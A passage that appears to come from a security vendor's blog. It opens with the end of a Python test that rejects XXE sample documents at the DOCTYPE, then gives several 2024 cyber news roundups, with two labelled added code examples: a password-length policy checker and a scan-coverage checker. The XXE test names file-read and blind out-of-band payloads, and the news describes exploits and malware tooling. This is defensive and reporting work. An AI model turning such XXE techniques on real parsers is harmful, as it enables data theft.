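    for doc in (XXE_FILE, XXE_BLIND):
        print("rejected:", rejects(doc))
```

Rejecting at the DOCTYPE rather than only blocking external fetches is deliberate: a parser that silently drops unresolved entities can still be coerced into error-based or out-of-band leaks, and an application that never expects a DTD loses nothing by refusing one.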

 

A global news agency suffers a cyberattack

Agence France-Presse (AFP) experienced a cyberattack on September 27, disrupting its content distribution infrastructure, but its core news reporting remains unaffected. The attack targeted AFP’s IT systems, specifically content delivery networks and file transfer services used to deliver news to clients. While the type of attack and the responsible party are still unknown, AFP quickly responded, with the French cybersecurity agency ANSSI assisting in securing the systems. AFP warned clients that their FTP credentials might have been compromised, advising them to update passwords and secure their systems. Despite these technical issues, AFP assured that its newsroom continues to operate without interruptions, delivering news globally in multiple languages. No group has claimed responsibility for the attack so far. (Hackread)

 

A Texas health system diverts patients following a ransomware attack

UMC Health System in Texas has been diverting patients after a ransomware attack forced them to take their IT systems offline. The incident, disclosed on September 27, led to both emergency and non-emergency patients being diverted to nearby hospitals. UMC launched an investigation and disconnected its systems to contain the breach. By Monday, some services were restored, and only a few patients were still being diverted. UMC’s Emergency Center is now accepting ambulance patients, while other facilities remain open but are not fully operational. The hospital has engaged third-party experts to aid in the recovery process. Downtime procedures have been implemented, and patients are being informed of changes to appointments. UMC continues its efforts to restore services safely and provide updates on the investigation and remediation efforts. (SecurityWeek)

 

Western Digital patches a critical vulnerability in network attached storage devices

A critical vulnerability, CVE-2024-22170, has been identified in Western Digital’s My Cloud devices, affecting models like My Cloud EX2 Ultra and PR4100. This flaw, with a CVSS score of 9.2, allows attackers to exploit an unchecked buffer in the Dynamic DNS client through a Man-in-the-Middle attack, leading to arbitrary code execution. Western Digital has addressed the issue in a firmware update and urges users to update immediately. The vulnerability poses risks of unauthorized access, data corruption, and system crashes. Western Digital thanks researchers at Claroty for responsibly disclosing the issue.  (CyberSecurity News)

 

Verizon and PlayStation each suffer outages

On Monday morning, thousands of Verizon users across major U.S. cities, including New York, Los Angeles, and Chicago, experienced widespread cellphone service outages. Over 104,000 reports were logged on Downdetector by 11:30 a.m. Eastern, with the number later dropping to 78,000. Many users reported their phones showing “SOS” mode, preventing calls and messages. Verizon confirmed the issue, with engineers working to resolve it, though the cause was unclear. Simultaneously, the PlayStation Network (PSN) faced a global outage, affecting services like gaming, account management, and the PlayStation Store. Sony is working to fix the issue, which began at 8:41 PM ET, with some services still down, potentially due to overloaded servers. Both outages disrupted users’ daily activities and work. (Bleeping Computer) (The New York Times)

 

A Crypto Criminal Stretches His Limits—And His Legs 

And finally, Krebs on Security chronicles an absolutely bonkers mix of cybercrime and corruption straight out of a pulp novel.  A California man, Adam Iza (aka “The Godfather”), is accused of not only dodging taxes on millions allegedly earned from cybercrime but also paying off local cops to help intimidate rivals. Iza, co-owner of the cryptocurrency platform Zort, reportedly spent investors’ money on luxury cars, jewelry, and even leg-lengthening surgery. I swear I am not making this up.

According to the FBI, Iza hired Los Angeles Sheriff’s Department officers to help him extort former business partners, some of whom were tied to the notorious hacker group UGNazi. One incident involved trying to steal a laptop full of cryptocurrency, while another involved kidnapping attempts. Iza allegedly paid these officers $280k a month for their “services,” like forcing rivals to hand over assets.

Iza’s scheme came to light after he stiffed a private investigator, triggering a cascade of lawsuits and criminal investigations. His girlfriend, also allegedly involved, is now dating the star of reality TV show Love Island. This tale has everything—crypto, hackers, corrupt cops, and reality show romance!  With corrupt deputies, stolen millions, and custom legs, this saga truly stretches the limits of what we thought possible in cybercrime. (Krebs on Security)

 

Critical NVIDIA flaw affects AI applications 

Researchers at Wiz have disclosed a critical vulnerability (CVE-2024-0132) affecting NVIDIA Container Toolkit and GPU Operator. The flaw affects any AI application that uses the toolkit to enable GPU support. NVIDIA issued a patch on September 26th.

Wiz stated, “The vulnerability enables attackers who control a container image executed by the vulnerable toolkit to escape from that container and gain full access to the underlying host system, posing a serious risk to sensitive data and infrastructure.” The researchers add, “The urgency with which you should fix the vulnerability depends on the architecture of your environment and the level of trust you place in running images. Any environment that allows the use of third party container images or AI models – either internally or as-a-service – is at higher risk given that this vulnerability can be exploited via a malicious image.” (Wiz, Nvidia)

 

North Korean hackers breach German missile manufacturer

North Korean hackers linked to the Kimsuky APT group successfully targeted Diehl Defence, a German missile manufacturer, by using spear-phishing emails with fake job offers. The attack involved booby-trapped PDF files and advanced social engineering tactics designed to steal login credentials. The breach marks major concerns due to the sensitive nature of the manufacturer’s work on air defense systems, including a recent contract with South Korea. (Security Week)

 

State CISOs struggle with budget constraints 

With a local community seemingly hit by a cyberattack every week, new research suggests why that might be. According to a new report from Deloitte and the National Association of State Chief Information Officers (NASCIO), nearly 40% of U.S. state CISOs believe their cybersecurity budgets fall short of what they need to keep their citizens safe. In fact, more than a third stated they do not have a dedicated cybersecurity budget. The majority of CISOs surveyed said third-party breaches were the biggest threat they currently face, followed by AI-enabled attacks and foreign state-sponsored espionage. (InfoSecurity Magazine)


Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts or schedule a demo.

Critical to CTEM Success: Driving Effective Scoping

In today’s rapidly escalating threat landscape, delaying action on cyber risk is no longer an option. Cyber threats are growing in both complexity and frequency, making it crucial for organizations to understand and prioritize their mission-critical assets now. Effective scoping in Continuous Threat Exposure Management (CTEM) is the key to identifying, assessing, and managing risks, ensuring that your organization stays ahead of emerging threats.

Understanding the scoping process

Scoping is not about limiting the reach of your CTEM program; instead, it provides a structured approach to organizing and communicating exposure management efforts and outcomes to leadership and stakeholders. By clarifying key questions during this stage, scoping puts exposure management in a meaningful business context.

Key questions during this stage include:

  • What do we own?
  • What does it do for our business?
  • What are the risks if it is compromised?

By answering these questions, organizations can create a clearer picture of their attack surface and better prepare for potential threats.

RedSeal’s role in smart scoping

RedSeal plays a pivotal role in supporting effective scoping within CTEM programs. By providing a reliable asset inventory, RedSeal consolidates resources from various environments—including public cloud, private cloud, on-premises, IT, operational technology (OT), and Internet of Things (IoT)—into a single, comprehensive model known as a network digital twin.

This powerful visualization tool allows organizations to map their resources into physical, logical, and custom topology groups. As a result, stakeholders can easily identify business-critical systems and assets, enabling them to define scopes that are relevant to their specific business context. The unparalleled ability of RedSeal to uncover and map hybrid infrastructure ensures that no potential vulnerability goes unnoticed.

Aligning security and business priorities

Incorporating effective scoping practices into your CTEM program is essential for bridging the gap between cybersecurity and business strategy. With RedSeal’s capabilities, organizations can align their security priorities with business priorities, ensuring that exposure management efforts are both relevant and impactful.

As you navigate the complexities of today’s threat landscape, remember that thoughtful scoping, powered by RedSeal, is key to maintaining a strong security posture. By focusing on what matters most to your business, you can enhance your organization’s resilience and protect against the ever-evolving array of cyber threats.

Reach out to RedSeal today to schedule a demo and learn about RedSeal’s pivotal role in supporting CTEM programs.

Cyber News Roundup for September 27, 2024

In today’s digital world, cyber threats are growing fast, and both skilled state-backed hackers and less sophisticated attackers are going after critical systems around the globe. From Russia’s Gamaredon group stepping up its cyber spying against Ukraine, to new vulnerabilities that allow hackers to remotely control everyday systems like Kia vehicles, the risks are more diverse and widespread than ever.

Recent events underline the need for taking proactive steps, whether it’s securing critical infrastructure like Kansas’ water systems or tackling malware that can get around two-factor authentication (2FA). With cyber campaigns like Salt Typhoon targeting U.S. broadband providers, and the CrowdStrike outage catching attention, organizations need to stay on their toes and keep up with the changing threat landscape.

As the risks grow, it’s a good time for businesses and governments to rethink their defenses and stay ahead of these evolving threats.


Russia’s Gamaredon remains highly active against Ukraine

ESET has published a report on the toolset used by the Russian threat actor Gamaredon to target Ukraine over the past two years. The researchers note that Gamaredon “is currently the most engaged APT group in Ukraine,” primarily conducting cyberespionage against Ukrainian government entities. The Security Service of Ukraine has attributed the threat actor to the FSB’s 18th Center of Information Security, based in Crimea.

ESET states, “In general, we can categorize Gamaredon’s toolset into downloaders, droppers, weaponizers, stealers, backdoors, and ad hoc tools. The group uses a combination of general-purpose and dedicated downloaders to deliver payloads. Droppers are used to deliver various VBScript payloads; weaponizers alter properties of existing files or create new files on connected USB drives, and stealers exfiltrate specific files from the file system. Additionally, backdoors serve as remote shells, and ad hoc tools perform specific functions, like a reverse SOCKS proxy or payload delivery using the legitimate command line program rclone.” (ESET)

Web vulnerability exposed Kia vehicles to hacks

A group of researchers today disclosed a vulnerability in a Kia web portal that could give an attacker remote control over vehicle functions using only a license plate number, WIRED reports. The attacker could exploit the flaw to reassign themselves as an owner of a vehicle, allowing them to unlock the car, start its ignition, or passively track its location. The researchers note, “These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.” WIRED says Kia appears to have patched the flaw. (Sam Curry, Wired)


NIST drops password complexity, mandatory reset rules

In the second public draft version of its password guidelines, the National Institute of Standards and Technology is making two changes. The first is that credential service providers stop requiring users to set passwords containing specific types of characters, and the second is to stop mandating periodic password changes (commonly every 60 or 90 days). The first change paves the way for longer passwords of between 15 and 64 characters that may include both ASCII and Unicode characters. The second supports the idea that password resets should only occur in the case of a credential breach, since making people change passwords frequently was resulting in people choosing weaker passwords. (Dark Reading)
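A verifier-side policy that applies the two draft changes above, written here as an added example (not code from the article, from Dark Reading, or from NIST). The 15/64 bounds are taken from the story; the NFC normalization step and the rejection of control characters are assumptions of this example.

```python
# Added example, not from the article or from NIST: a verifier-side policy that
# applies the two draft changes described above. The 15/64 bounds come from the
# article; the NFC normalization step is an assumption of this example.
import unicodedata
from datetime import date
from typing import Optional

MIN_LEN = 15  # lower bound quoted in the article (assumed to apply to all accounts here)
MAX_LEN = 64  # upper bound quoted in the article


def check_password(candidate: str) -> tuple[bool, str]:
    """Accept or reject a new password using length alone, with no composition rules.

    Length is measured in Unicode code points after NFC normalization, so a
    precomposed 'é' and 'e' + combining accent are counted the same way.
    Printable ASCII, spaces and any Unicode character are allowed; only
    control characters are rejected because they cannot be typed deliberately.
    """
    normalized = unicodedata.normalize("NFC", candidate)
    if any(unicodedata.category(ch) == "Cc" for ch in normalized):
        return False, "control characters are not allowed"
    length = len(normalized)
    if length < MIN_LEN:
        return False, f"too short: {length} characters, minimum is {MIN_LEN}"
    if length > MAX_LEN:
        return False, f"too long: {length} characters, maximum is {MAX_LEN}"
    return True, "accepted"


def reset_required(last_changed: date, today: date, breached: bool,
                   max_age_days: Optional[int] = None) -> bool:
    """Decide whether a user must change their password.

    The draft guidance corresponds to max_age_days=None: age alone never forces
    a change, only evidence of compromise does. Passing max_age_days=90
    reproduces the legacy calendar-driven rotation the draft drops.
    """
    if breached:
        return True
    if max_age_days is not None:
        return (today - last_changed).days >= max_age_days
    return False


if __name__ == "__main__":
    for pw in ("correct horse battery staple", "Tr0ub4dor&3", "naïve passphrase with café"):
        print(repr(pw), check_password(pw))
    print("legacy 90-day rule:", reset_required(date(2024, 1, 1), date(2024, 9, 27), False, 90))
    print("draft rule:        ", reset_required(date(2024, 1, 1), date(2024, 9, 27), False))
```

Note that an all-lowercase passphrase passes while a short "complex" password fails, which is exactly the trade the draft makes.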


CISA speaks out regarding Kansas water incident

Following up on a story we covered on Wednesday regarding the cybersecurity issue at the water treatment facility in Arkansas City, Kansas, CISA released a new advisory yesterday, Thursday, as a reminder that “exposed and vulnerable OT/ICS systems may allow cyber threat actors to use default credentials, conduct brute force attacks, or use other unsophisticated methods to access these devices and cause harm.” The agency urged operators to apply its previously released recommendations to defend their systems. (The Record)


Hackers claim a Chrome 2FA feature bypass takes less than ten minutes

Google introduced application-bound encryption in Chrome 127 for Windows to prevent cookie-stealing hackers from bypassing two-factor authentication (2FA) using infostealer malware. This security feature ties encrypted data to app identity, making it harder for hackers to access sensitive information. However, multiple infostealer malware developers, including those behind Lumma, Vidar, and Rhadamanthys, claim to have quickly bypassed this new protection. Reports from Bleeping Computer confirm that these malware updates can break Chrome’s cookie encryption, effectively rendering 2FA protections useless. Once attackers steal session cookies, they can bypass authentication and gain full access to users’ accounts and sensitive data. (Forbes)


CrowdStrike VP testifies before Congress

Adam Meyers, vice president for counter-adversary operations at CrowdStrike, appeared before a US congressional committee yesterday to address questions about the global outage caused by a faulty CrowdStrike update in July, Infosecurity Magazine reports. The outage was due to a mismatch between input parameters and the rules engine in CrowdStrike’s Falcon sensors, triggering “blue screen of death” errors on all Windows machines that installed the update. Meyers stated, “On July 19, 2024, new threat detection configurations were validated through regular validation procedures and sent to sensors running on Microsoft Windows devices. However, the configurations were not understood by the Falcon sensor’s rules engine, leading affected sensors to malfunction until the problematic configurations were replaced.” Meyers apologized for the disruption and outlined measures taken to prevent future incidents, including enhanced validation and testing processes, phased rollouts of updates, and added runtime safeguards. (Infosecurity Magazine)


Salt Typhoon strikes US ISPs

The Wall Street Journal’s sources say US investigators discovered a cyberattack campaign from a Chinese-linked threat actor dubbed Salt Typhoon. This campaign sought to establish footholds in several US-based cable and broadband providers. It’s unclear if the goal was simply reconnaissance or a potential staging for further cyberattacks. It’s been a busy year for China-linked threat groups operating under a “Typhoon” epithet. In January, the US disrupted operations by Volt Typhoon against critical infrastructure, and just last week, a Flax Typhoon botnet was disrupted. US officials frequently warn that due to the depth and frequency of China-linked cyberattacks, these campaigns likely represent the “tip of the iceberg.” (WSJ)


“Unsophisticated methods” used against industrial systems

Not all cyberattacks need the advanced capabilities of nation-states behind them. CISA warned that threat actors continue to target critical infrastructure OT and ICS devices with “unsophisticated” methods. This includes using default credentials or brute force attacks. The agency said it “continues to respond to active exploitation of internet-accessible” devices, particularly citing the Water and Wastewater Systems Sector being hit by pro-Russian hacktivists since 2022. CISA issued an advisory back in May on securing against these basic attacks, recommending changing default passwords, enabling MFA, applying security updates, and putting human-machine interfaces behind firewalls. (Bleeping Computer)


Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.

Building a Robust Vulnerability Management Program: Bridging the Gaps with RedSeal

Effective vulnerability management is essential for safeguarding your network against evolving cyber threats. Recall the Equifax data breach of 2017, which exposed the personal information of over 140 million people, including Social Security numbers and birth dates. This breach resulted from Equifax’s failure to patch a known vulnerability, despite the patch being available for several months. This oversight allowed attackers to exploit the vulnerability and access sensitive data. The incident highlights the critical need for a robust vulnerability management program to ensure timely identification and remediation of security flaws, preventing similar breaches.

While vulnerability scanners and managers are vital tools, they aren’t foolproof. Without a complete and accurate view of your network, these tools can miss or misjudge critical vulnerabilities, leaving your organization exposed. This is where RedSeal makes a difference. By providing comprehensive network visibility, RedSeal enhances the capabilities of traditional scanners, helping you build a more robust and resilient vulnerability management program.

What can you do with RedSeal?

  1. Report missed network assets and subnets: Vulnerability scanners often overlook network assets and subnets. RedSeal’s comprehensive network visibility identifies these gaps, ensuring that all assets are accounted for and properly scanned.
  2. Visualize reachable assets: Optimizing scanner placement is crucial for effective vulnerability management. RedSeal provides a clear visualization of all reachable assets, allowing you to strategically position your scanners where they are most needed.
  3. Pinpoint access issues: Network devices and rules can sometimes block scanners from accessing certain areas. RedSeal helps identify these obstacles, ensuring that your scanners can reach every critical component of your network.
  4. Enhance risk assessment: Accurate prioritization of vulnerabilities requires additional context beyond what traditional scanners provide. RedSeal offers network and business context, improving the accuracy of your risk assessments and helping you prioritize remediation efforts more effectively.
  5. Contain unpatched vulnerabilities: RedSeal identifies precise access paths and assets for containing unpatched vulnerabilities, reducing the risk of exploitation and enhancing your response capabilities.
  6. Consolidate vulnerability data: Managing data from multiple scanners and vendors can be challenging. RedSeal consolidates this information, providing a unified view of your vulnerability landscape and streamlining your management efforts.
  7. Integrate with third-party solutions: Push scan coverage analysis to third-party solutions like Rapid7 and Tenable. RedSeal enhances the effectiveness of these tools by providing comprehensive network insights that improve scan accuracy and coverage.
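A scan-coverage check of the kind items 1 and 3 describe, added here as an example and not RedSeal’s code, output, or data format: it carves inventoried subnets against the scanner’s target ranges to report unscanned address space, then splits hosts with no scan result into "never targeted" versus "targeted but unreachable". All subnets and hosts are constructed sample values.

```python
# Added example, not RedSeal's code: a scan-coverage check over constructed
# sample data that reports inventoried subnets the scanner never targeted and
# classifies unscanned hosts by whether they were in scope at all.
import ipaddress
from typing import Iterable


def _networks(cidrs: Iterable[str]) -> list:
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def _net_key(net) -> tuple:
    return (net.version, int(net.network_address), net.prefixlen)


def uncovered_subnets(inventory: Iterable[str], scan_targets: Iterable[str]) -> list[str]:
    """Return the address space in `inventory` that no scan target covers.

    Two CIDR blocks either nest or are disjoint, so each inventory block is
    carved with address_exclude() until only the unscanned remainders are left.
    """
    targets = _networks(scan_targets)
    remainders = []
    for block in _networks(inventory):
        pieces = [block]
        for target in targets:
            if target.version != block.version:
                continue
            carved = []
            for piece in pieces:
                if piece.subnet_of(target):        # fully inside a target: scanned
                    continue
                if target.subnet_of(piece):        # target inside piece: cut the hole
                    carved.extend(piece.address_exclude(target))
                else:                              # disjoint: untouched
                    carved.append(piece)
            pieces = carved
        remainders.extend(pieces)
    return [str(n) for n in sorted(remainders, key=_net_key)]


def classify_unscanned_hosts(model_hosts: Iterable[str], scanned_hosts: Iterable[str],
                             scan_targets: Iterable[str]) -> dict[str, list[str]]:
    """Split model hosts with no scan result into two gap types.

    'not_in_scope' hosts were never targeted (fix the scan configuration);
    'in_scope_no_result' hosts were targeted but returned nothing, which points
    at a firewall rule or routing problem between scanner and host.
    """
    targets = _networks(scan_targets)
    seen = {ipaddress.ip_address(h) for h in scanned_hosts}
    gaps = {"not_in_scope": [], "in_scope_no_result": []}
    hosts = sorted((ipaddress.ip_address(h) for h in model_hosts),
                   key=lambda a: (a.version, int(a)))
    for host in hosts:
        if host in seen:
            continue
        in_scope = any(host.version == t.version and host in t for t in targets)
        gaps["in_scope_no_result" if in_scope else "not_in_scope"].append(str(host))
    return gaps


# Constructed sample data (not from any real network model or scanner export).
INVENTORY = ["10.0.0.0/24", "10.0.1.0/24", "192.168.5.0/24"]
SCAN_TARGETS = ["10.0.0.0/25", "192.168.5.0/24"]
MODEL_HOSTS = ["10.0.0.10", "10.0.0.200", "10.0.1.5", "192.168.5.7", "192.168.5.9"]
SCAN_RESULTS = ["10.0.0.10", "192.168.5.7"]

if __name__ == "__main__":
    print("unscanned subnets:", uncovered_subnets(INVENTORY, SCAN_TARGETS))
    print("unscanned hosts:  ", classify_unscanned_hosts(MODEL_HOSTS, SCAN_RESULTS, SCAN_TARGETS))
```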

Incorporating RedSeal into your vulnerability management program transforms how you approach security. By addressing the limitations of traditional scanners and leveraging RedSeal’s advanced capabilities, you can build a more resilient and responsive vulnerability management strategy. Reach out to RedSeal or schedule a demo today to learn how to bolster your cybersecurity efforts and make the strategic move that promises long-term benefits and peace of mind.

Cyber News Roundup for September 13, 2024

Recent cybersecurity updates include the National Vulnerability Database (NVD) struggling with a critical backlog, which hampers its effectiveness in vulnerability analysis. SonicWall is dealing with a significant access control vulnerability (CVE-2024-40766) in SonicOS, currently exploited in the wild. Avis has disclosed a breach affecting nearly 300,000 customers. On a positive note, Google Cloud has introduced new air-gapped backup vaults to boost ransomware protection, and MasterCard is set to acquire Recorded Future for $2.65 billion.

Read these stories and more in today’s Cyber News Roundup.


The Fall of the National Vulnerability Database

The National Vulnerability Database (NVD) has experienced a significant slowdown, leaving thousands of vulnerabilities without analysis, which is critical for identifying risks. This has raised concerns in the cybersecurity community, especially as many organizations and government contractors rely on NVD for vulnerability management. The issues stem from a backlog, underfunding, and challenges in handling the increasing volume of CVEs. While alternatives like Open Source Vulnerabilities (OSV) exist, NVD remains essential for many, especially under federal requirements. (Dark Reading)


SonicWall vulnerability exploited in the wild

A recently patched access control vulnerability (CVE-2024-40766) affecting SonicWall’s SonicOS is being exploited in the wild, BleepingComputer reports. The vulnerability affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions. SonicWall urges customers to apply the patch as soon as possible. The company adds, “SonicWall strongly advises that customers using GEN5 and GEN6 firewalls with SSLVPN users who have locally managed accounts immediately update their passwords to enhance security and prevent unauthorized access. Users can change their passwords if the ‘User must change password’ option is enabled on their account. Administrators must manually enable the ‘User must change password’ option for each local account to ensure this critical security measure is enforced.” (Bleepingcomputer)


Car rental company Avis discloses data breach

According to notification letters sent to customers on Wednesday and filed with California’s Office of the Attorney General, an unknown threat actor had access to Avis’s business applications from August 3 until August 6. The breach, which was discovered last Thursday, resulted in the theft of “some customers’ personal information, including their names and other undisclosed sensitive data.” This is a developing story. (BleepingComputer)


Wisconsin Medicare users had information leaked in MOVEit breach

More fallout from the MOVEIt breach of last year: “the Centers for Medicare & Medicaid Services (CMS), which is a federal agency that manages the Medicare program, as well as the Wisconsin Physicians Service Insurance Corporation (WPS) said on Friday that they have begun notifying people whose personal information leaked after hackers exploited a vulnerability in the MOVEit software.” The discovery follows a second investigation into the breach conducted by WPS in May, after receiving “new information” about the breach. (The Record)


1.7 million impacted in payment processing breach

In an ironic twist, payment gateway provider Slim CD says they’ve swiftly initiated an investigation into a breach affecting around 1.7 million individuals. While the company claims to be moving quickly to address the issue, the breach actually occurred in August 2023 but went undetected until almost a year later in June 2024. Information exposed in the attack includes names, physical addresses, credit card numbers, and payment card expiration dates. Despite the impact, Slim CD has not offered any free identity theft protection services to those affected, instead advising individuals to stay vigilant and order a free credit report. (Bleeping Computer, The Register)


Avis breach impacts almost 300,000 customers

An update to a story we first brought to you on Monday: Car rental company Avis is now reporting that a breach discovered last week has impacted over 299,000 of its customers, which, according to Bleeping Computer, is less than 1% of the company’s customer base. The threat actor was able to access business applications last month and stole personal information, including names and other undisclosed data. (Bleeping Computer)


New RaaS operation is recruiting criminal affiliates

Palo Alto Networks’ Unit 42 has published a report on Repellent Scorpius, a ransomware-as-a-service operation that surfaced in May 2024. The group distributes the Cicada3301 ransomware and conducts double-extortion attacks by exfiltrating data before deploying the ransomware. The researchers state, “Unit 42 has evidence to suggest that the Repellent Scorpius operators have developed a RaaS affiliate program. It operates a control panel for affiliates and ransom payment pages for victims, and actively recruits initial access brokers (IAB) and network intruders on Russian-language cybercrime forums.” (Palo Alto Networks)


Earth Preta deploys new malware in the Asia-Pacific

Trend Micro is tracking new variants of malware used by the China-aligned threat actor Earth Preta (also known as “Mustang Panda”). The threat actor is using spearphishing emails and removable drives to deploy malware against government entities in the Asia-Pacific region. Trend Micro states, “Earth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets’ networks via removable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various tasks, including the execution of tools such as RAR for collection and curl for data exfiltration. PUBLOAD was also used to introduce supplemental tools into the targets’ environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option.” (Trend Micro)


Slim CD notifies 1.7M customers of data breach

Electronic payment firm Slim CD has notified nearly 1.7 million credit card holders that their data may have been stolen after an attacker accessed its systems between August 17, 2023, and June 15, 2024. A third-party investigation uncovered the incident on June 15. Slim CD said it reviewed its data privacy and security policies and implemented additional safeguards following the incident. KnowBe4 awareness advocate James McQuiggan said, “When organizations realize that cybercriminals are inside their network for long periods, there is a gap with continuous security monitoring. Accompanied by a robust Security Incident Management (SIEM) system integrated with threat intelligence, the breach could have been detected sooner.” (SC Media)


Google Cloud introduces air-gapped backup vaults

Google Cloud has introduced air-gapped backup vaults as part of its enhanced Backup and Disaster Recovery (DR) service, now available in preview. These vaults provide robust protection against ransomware and unauthorized data manipulation by creating immutable and indelible backups, preventing modification or deletion until a set retention period elapses. Isolated from the customer’s Google Cloud project, these air-gapped vaults reduce the risk of direct attacks on backups. (Cyber Security News)


Lazarus Group’s VM Connect campaign spoofs CapitalOne

New research from ReversingLabs shows that the Lazarus Group is continuing its campaign of targeting developers with malicious software packages on open-source repositories, this time by posing as employees of the financial services firm Capital One and luring developers to a GitHub repository containing a “homework task.” This is similar to, but distinct from, a story we reported on last week in which the Lazarus Group was seen doing the same thing through LinkedIn using CovertCatch. In this case, ReversingLabs researchers say the activity is connected to a 2023 VMConnect campaign focused on Python modules. They added, “It is clearly intended to create a sense of urgency for the would-be job seeker, thus making it more likely that they would execute the package without performing any type of security or even source code review first.” (InfoSecurity Magazine)


Mastercard buys Recorded Future

Financial payment company MasterCard announced yesterday that it will acquire the threat intelligence company Recorded Future for $2.65 billion, adding to its current portfolio of security products, which include risk assessments and transaction protection. In its press release, MasterCard noted that “Recorded Future is a well-known intelligence firm that boasts more than 1,900 clients internationally, including 45 governments and over half of Fortune 500 companies.” The firm will remain an independent subsidiary, and the deal is expected to close in the first quarter of 2025. (Cyberscoop)

Have questions? Reach out to RedSeal today to chat with one of our cybersecurity experts.

Cyber News Roundup for September 6, 2024

Recent cybersecurity headlines are buzzing with urgent and dramatic developments. From a critical remote code execution flaw in Progress Software’s WhatsUp Gold to a disruptive cyberattack hitting Transport for London’s internal systems, the stakes have never been higher. Sweden is on edge over potential Russian sabotage, while a new Cicada ransomware variant is targeting VMware ESXi systems. Halliburton’s confirmation of a major data breach and the FBI’s alert on North Korean social engineering in the crypto sector only add to the urgency. Dive into these stories and more to discover what they mean for the future of cybersecurity.


Critical RCE flaw affects Progress Software’s WhatsUp Gold

Censys has published an advisory on a remote code execution vulnerability affecting Progress Software’s WhatsUp Gold network monitoring and management solution, SecurityWeek reports. The researchers explain, “The vulnerability exists in the GetFileWithoutZip functionality of WhatsUp Gold. An attacker can send a crafted request with directory traversal payloads to upload files to arbitrary locations on the server. By uploading malicious files, the attacker can achieve remote code execution.” Several proof-of-concept exploits have been published on GitHub, and users are urged to update to version 2023.1.3 as soon as possible. (Censys, SecurityWeek)


Transport for London suffers cyberattack

The local government body responsible for most of the transport system in Greater London is currently dealing with a cyberattack, but representatives state that there is no evidence that customer information was compromised during the incident. The BBC has stated that the attack mainly impacted the transport provider’s backroom systems at the corporate headquarters. (BBC News)


Sweden warns of heightened risk of Russian sabotage

Security companies in Sweden have reported an increase in sabotage attempts, such as flying mapping drones over defense facilities, and other “more aggressive” espionage, cyber-attacks and misinformation activities. This appears to be connected to the fact that Sweden is supporting Ukraine, and has joined NATO, and evidence of increased aggression in espionage as well as disinformation about the reliability of Swedish military products has been seen in large and small companies involved in the manufacture of weapons and related technologies. (The Guardian)


New Cicada variant preys on VMware ESXi systems

This new ransomware-as-a-service group, named Cicada3301, is already quite busy, with 23 victims since mid-June, according to its leak site. Its ransomware is written in Rust and targets Windows and Linux/ESXi hosts. Researchers at Truesec analyzed a variant that targets VMware ESXi systems and said it appears to be a port of the Windows malware. They added that “the Cicada3301 ransomware has several interesting similarities to the ALPHV ransomware.” (Security Affairs)


SlowTempest espionage campaign unfolds within China

Researchers at Securonix are tracking what is being called a highly coordinated espionage operation that is targeting people and organizations within China and appears to be the work of an organization with deep knowledge of Chinese language and culture. The goal of the attackers appears to be espionage, persistent access, and potential sabotage, with the end goal being to infiltrate government or high-profile business sectors. The researchers cannot say where the attacks are ultimately coming from or who is behind them, but they note that the sophisticated attack has been designed not just to gain access to their victims, but to maintain it in order to achieve broader strategic objectives, potentially aligned with state-sponsored activities. (The Record)


Threat actors have poisoned GlobalProtect VPN software to deliver WikiLoader

Hackers have been targeting VPNs like GlobalProtect to inject malware and steal sensitive data, compromising private networks without detection. Cybersecurity researchers at Palo Alto Networks discovered that threat actors have poisoned GlobalProtect VPN software to deliver WikiLoader, a sophisticated malware loader. Active since late 2022, WikiLoader primarily spreads via phishing but recently shifted to SEO poisoning, leading users to fake installer pages. The malware uses complex evasion techniques, including DLL sideloading and shellcode decryption, making detection difficult. WikiLoader’s operators utilize compromised WordPress sites and MQTT brokers for command and control. The malware creates persistence through scheduled tasks and hides in over 400 files within a malicious archive. Despite the malware’s complexity, it was detected by Cortex XDR through behavioral indicators. Mitigations include enhanced SEO poisoning detection, robust endpoint protection, and application whitelisting. (Cyber Security News)


Voldemort malware delivered via social engineering

Proofpoint describes a social engineering campaign that’s impersonating tax authorities in Europe, Asia, and the US in order to deliver a custom strain of malware dubbed “Voldemort.” The researchers explain, “The attack chain comprises multiple techniques currently popular within the threat landscape as well as uncommon methods for command and control (C2) like the use of Google Sheets. Its combination of the tactics, techniques, and procedures (TTPs), lure themes impersonating government agencies of various countries, and odd file naming and passwords like ‘test’ are notable. Researchers initially suspected the activity may be a red team, however the large volume of messages and analysis of the malware very quickly indicated it was a threat actor.” The researchers don’t attribute the activity to any particular threat actor, but they believe the campaign’s goal is cyberespionage. (Proofpoint)


Halliburton confirms data stolen in cyberattack

Following up on a story from last week on Cyber Security Headlines, the U.S. oil service giant confirmed Tuesday that corporate data was stolen from its computer systems during a ransomware attack it suffered in August. Halliburton stopped short of confirming a ransomware extortion scheme but said significant portions of its IT systems were disrupted. The company said it engaged law enforcement to help identify exactly what data was stolen and who they will need to notify. The company’s acknowledgement comes on the heels of CISA, the FBI, and HHS blaming the RansomHub gang for the attack. (SecurityWeek)


FBI warns crypto firms of aggressive North Korean social engineering

On Tuesday, the FBI warned that North Korean hacking groups are aggressively targeting crypto company employees in sophisticated social engineering attacks. After the threat actors identify specific DeFi and crypto businesses, they then target employees with offers of new employment or investment opportunities to deploy crypto-stealing malware. The communications use fluent English and leverage detailed personal information to boost credibility and appeal. The FBI added that the threat actors are also well-versed in technical aspects of cryptocurrency. The FBI provided a list of indicators associated with North Korean social engineering activity and best practices for companies to lower the risk of compromise. (Bleeping Computer and The Record)


North Korean social engineering attacks target the cryptocurrency sector

The US Federal Bureau of Investigation (FBI) has issued an advisory on North Korean social engineering campaigns targeting employees in the cryptocurrency industry. The Bureau notes, “North Korean malicious cyber actors conducted research on a variety of targets connected to cryptocurrency exchange-traded funds (ETFs) over the last several months. This research included pre-operational preparations suggesting North Korean actors may attempt malicious cyber activities against companies associated with cryptocurrency ETFs or other cryptocurrency-related financial products. For companies active in or associated with the cryptocurrency sector, the FBI emphasizes North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products.” (FBI)


